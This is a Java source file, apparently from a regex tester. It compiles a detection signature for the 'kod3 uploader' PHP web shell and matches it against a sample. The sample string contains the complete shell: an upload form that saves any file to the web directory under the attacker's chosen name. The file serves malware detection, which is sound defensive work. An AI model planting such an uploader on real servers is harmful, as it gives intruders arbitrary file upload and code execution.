import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class Example {
public static void main(String[] args) {
final String regex = "^(?:[[:^print:][:cntrl:]\\s]|GIF89.{0,20})*<\\?(?:php)?\\s*echo\\s*['\"]<title>kod3 uploader<\\/title>.{0,70}?multipart\\/form-data[\"']\\s*name=[\"']uploader.{0,240}?\\@move_uploaded_file\\(\\$_files\\[[\"']file['\"]\\].{0,50}?echo\\s*['\"]upload\\s*successfully.{0,60}?[[:punct:]\\s]+$";
final String string = "<?php\n\n\n"
+ "echo \"<title>kod3 Uploader</title>\";\n"
+ "echo \"<form method='post' enctype='multipart/form-data' name='uploader'>\";\n\n"
+ "echo '<input type=\"file\" name=\"file\" ><input name=\"upl\" type=\"submit\" id=\"upl\" value=\"Upload\"></form>';\n\n"
+ "if(isset($_POST['upl'])&&$_POST['upl']== \"Upload\"){\n"
+ " if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])){\n"
+ " echo 'Upload Successfully ;)<br><br>';\n"
+ " }else{\n"
+ " echo 'Upload failed :(<br><br>';\n"
+ " }\n"
+ "}\n\n\n"
+ "?>";
final Pattern pattern = Pattern.compile(regex, Pattern.CASE_INSENSITIVE | Pattern.DOTALL);
final Matcher matcher = pattern.matcher(string);
while (matcher.find()) {
System.out.println("Full match: " + matcher.group(0));
for (int i = 1; i <= matcher.groupCount(); i++) {
System.out.println("Group " + i + ": " + matcher.group(i));
}
}
}
}